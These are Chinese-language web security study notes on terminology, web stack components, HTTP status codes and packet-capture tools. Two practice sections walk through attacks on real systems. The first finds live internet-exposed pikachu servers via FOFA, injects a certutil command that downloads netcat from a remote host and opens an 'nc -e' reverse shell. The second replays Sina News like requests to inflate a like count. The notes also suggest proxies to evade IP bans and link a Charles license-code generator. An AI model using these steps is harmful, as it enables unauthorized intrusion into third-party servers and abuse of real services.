文章目錄
- 常見名詞
- 小實戰
- 網站搭建
- 小實戰
- 抓包模擬器
- 狀態碼返回值
- 網站搭建
- WEB應用安全漏洞
- 數據包&封包&信息收集
- **參考點**
常見名詞
前后端,POC/EXP,Payload/Shellcode,后門/Webshell,木馬/病毒,
反彈,回顯,跳板,黑白盒測試,暴力破解,社會工程學,撞庫,ATT&CK等
名詞解釋
小實戰
-
在
fofa
暗網瀏覽器中,使用"pikachu" && country="CN" && title="Get the pikachu"
命令,查詢在線pikachu服務器,進入測試命令執行漏洞 -
執行命令,查看回顯
-
查看本機是哪種服務器,接著使用下載命令,將
遠程連接nc
下載到本地,并命名為n.exe
文檔下載命令轉換 -
選擇
CMD
下載命令,復制命令,使用命令執行127.0.0.1 & certutil.exe -urlcache -split -f http://www.xxx.com:80/nc.exe n.exe
,出現以下,表示下載完成,也可以使用dir查看
-
接著在想要反彈shell的電腦上使用命令
nc -lvvp 端口號(5566)
監聽端口;在肉機上用nc -e /bin/sh(或cmd) 目標ip 5566
;成功連接上遠端服務器。
網站搭建
Web應用&架構搭建&漏洞概念&HTTP
Web應用&架構
理解不同WEB應用組成角色功能架構:
開發語言,程序源碼,中間件容器,數據庫類型,服務器操作系統,第三方軟件等
開發語言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript等
程序源碼:根據開發語言分類;應用類型分類;開源CMS分類;開發框架分類等
中間件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等
數據庫類型:Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB等
服務器操作系統:Windows系列,Linux系列,Mac系列等
第三方軟件:phpmyadmin,vs-ftpd,VNC,ELK,Openssh等
小實戰
一個好玩的東西,新浪新聞點贊,在不登陸的情況下只能點贊一次,究其原因應該是瀏覽器前端問題,可以刷新頁面繼續點贊,也可以截取數據包,多次發送就能解決僅能發送一次的問題。
- 已經點贊后,無論如何去點都無法再次增加點贊量,此時的點贊量為229。
-
開啟
burpsuite
抓包,并右鍵送至中繼器(repeater)
-
關閉抓包,在repeater中繼續send數據包,刷新網頁查看點贊量,此時的點贊量已經到了250次了。
抓包模擬器
在PC端顯現出來的瀏覽器與手機端瀏覽器顯現出來的不同,使用burpsuite
抓包,觀看數據包的區別。
- 在
burpsuite
中配置代理,其中127是本地瀏覽器抓包,10是對該計算機局域網內進行抓包(特指模擬器)
- 模擬器更改配置,
代理--手動
,代理服務器主機名
改為本機IP
地址,dialing端口與上述一致,為8888
,如下:
- 分別在PC端與模擬器上抓包,讓數據流經burp抓包工具,如下:
通過User-Agent
可知其發生差異的原因
狀態碼返回值
參考文章1
參考文章2
400
:發送請求有語法錯誤
403
:文件夾存在,沒有權限訪問
404
:訪問資源不存在(文件/文件夾)
3xx
:跳轉,處置過程,判斷可有可無
????重定向(302)
5xx
:內部錯誤,服務器問題,判斷可有可無
????500.服務器內部異常
????504.服務器請求超時,沒有返回結果
在對目標進行掃描時,盡量勾選它們,為了不放過任何結果,需要進行掃描
購買快代理
,可以隨時更換ip,防止ip被封禁,也可以實現VPN的功效。
網站搭建
安裝的前提條件:
- 擁有一臺自己的服務器和屬于自己的域名(域名要進行備案,如果不備案只能在大陸之外進行訪問)
- 服務器安裝寶塔集成環境,方便操作使用
- 選用遠程連接工具,可以使用Windows自帶的遠程連接,也可以使用
FinalShell
進行連接,在遠程服務器上進行操作
選擇安裝
選用Windows
搭建:
- 使用遠端
mstsc
進行搭建,域名沒有在國內備案,在阿里云選用大陸之外的云服務器
選用按量收費,雙核4G,服務器選用Windows版本
- 確認下單之后,配置安全組,配置服務器密碼,這些后期都能進行配置
- 在服務器上下載寶塔,需要注冊,在域名處提前配置好,將域名訪問映射到服務器的ip,寶塔賬號密碼是隨機的
- 直接關掉該頁面,會出現控制面板工具,復制面板地址到本機瀏覽器,開始網站的部署。
- 進入以下界面,可以選擇傻瓜式安裝,也可以自己進行配置安裝,在軟件商店中選擇。
Win參考連接
Linux參考連接
WEB應用安全漏洞
Web應用安全漏洞分類
SQL注入,文件安全,RCE執行,XSS跨站,CSRF/SSRF/CRLF,
反序列化,邏輯越權,未授權訪問,XXE/XML,弱口令安全等
安全漏洞解釋
數據包&封包&信息收集
參考連接
抓包的意義: ????在我們安全測試中,對方可能會提供相對應的ip 地址,域名等等,那么有的應用是不會給你的,當在你測試的時候是不知道對方的目標名字什么的,那么我們就可以通過抓取數據包來獲得你想要的信息,例如,對方主機/ip,或者與其相關的信息。
抓包的對象: 那么抓包他主要是針對協議去抓取的,根據不同的協議配對不同的抓包工具,就好比我們的網站他可以用BURP抓包工具,那么我們的APP或者小程序,它就不行了我們的BURP就抓取不到,為什么,因為我們的APP/小程序他走的不是HTTP協議的,所有抓取不到。
抓包的協議: ????抓包的協議呢,就是我們的APP,它也可以是HTTP協議的走向,因為我們的HTML5就能做出APP,那么我們HTML5他的走向協議就是http協議,那個APP點開其實就是打開網站了,你留心可以發現,網站有一些網站和我們點開APP十分像
抓包的支持: ????其實就是目標他支持哪些抓包工具,支持哪些協議
封包的意義: ????封包他就能自定義我們的一個數據包,封包技術說簡單也不簡單,就是將一系列操作封裝為數據包,方便使用,很多我們的外掛都用到封包技術,就相當于說你自定義一個數據包封裝發送給服務器
參考點
Fiddler:
????是一個http協議調試代理工具,它能夠記錄并檢查所有你的電腦和互聯網之間的http通訊,設置斷點,查看所有的“進出”Fiddler的數據(指cookie,html,js,css等文件)。 Fiddler 要比其他的網絡調試器要更加簡單,因為它不僅僅暴露http通訊還提供了一個用戶友好的格式。
手機證書安裝,需要將防火墻關閉,安裝證書步驟參考
Charles:
????是一個HTTP代理服務器,HTTP監視器,反轉代理服務器,當瀏覽器連接Charles的代理訪問互聯網時,Charles可以監控瀏覽器發送和接收的所有數據。它允許一個開發者查看所有連接互聯網的HTTP通信,這些包括request, response和HTTP headers (包含cookies與caching信息)。
????在模擬器中添加證書,help -->SSLproxying --> save Charles root certificate,保存之后,在模擬器中保存到文件夾中,接著設置-安全-(加密與憑據)用戶憑據-從存儲設備安裝
/ 設置-WALN-更多WALN設置-安裝證書
,接著會讓輸入密碼,安裝就能抓包。
抓取的包全部出現unknow的解決方法:
proxy --> SSL Proxying Settings --> Add
來添加主機和端口,
如果個別情況出現unknow,可能是本身抓包軟件存在個別漏抓問題。可以忽略
從左到右分別為:
(1)清除當前會話
(2)開始記錄
(3)開啟SSL代理
(4)開始限流/停止限流
(5)開始斷點/停止斷點
(6)根據所寫內容撰寫新請求
(7)重發選定請求
(8)工具
(9)設置
Charles 激活碼在線計算器
ios配置代理
ios下載證書問題
burp+逍遙模擬器 app抓包
TCPDump:
????是可以將網絡中傳送的數據包完全截獲下來提供分析。它支持針對網絡層、協議、主機、網絡或端口的過濾,并提供and、or、not等邏輯語句來幫助你去掉無用的信息。
BurpSuite:
????是用于攻擊web 應用程序的集成平臺,包含了許多工具。Burp Suite為這些工具設計了許多接口,以加快攻擊應用程序的過程。所有工具都共享一個請求,并能處理對應的HTTP 消息、持久性、認證、代理、日志、警報。
Wireshark:
????是一個網絡封包分析軟件。網絡封包分析軟件的功能是截取網絡封包,并盡可能顯示出最為詳細的網絡封包資料。Wireshark使用WinPCAP作為接口,直接與網卡進行數據報文交換。
WireShark使用教程
科來網絡分析系統:
????是一款由科來軟件全自主研發,并擁有全部知識產品的網絡分析產品。該系統具有行業領先的專家分析技術,通過捕獲并分析網絡中傳輸的底層數據包,對網絡故障、網絡安全以及網絡性能進行全面分析,從而快速排查網絡中出現或潛在的故障、安全及性能問題。
WPE&封包分析:
????是強大的網絡封包編輯器,wpe可以截取網絡上的信息,修改封包數據,是外掛制作的常用工具。一般在安全測試中可用來調試數據通訊地址。
封包攔截器
封包監聽工具
Charles (茶杯)
https://blog.csdn.net/weixin_45459427/article/details/108393878
Fidder
https://blog.csdn.net/weixin_45043349/article/details/120088449
BurpSuite
https://blog.csdn.net/qq_36658099/article/details/81487491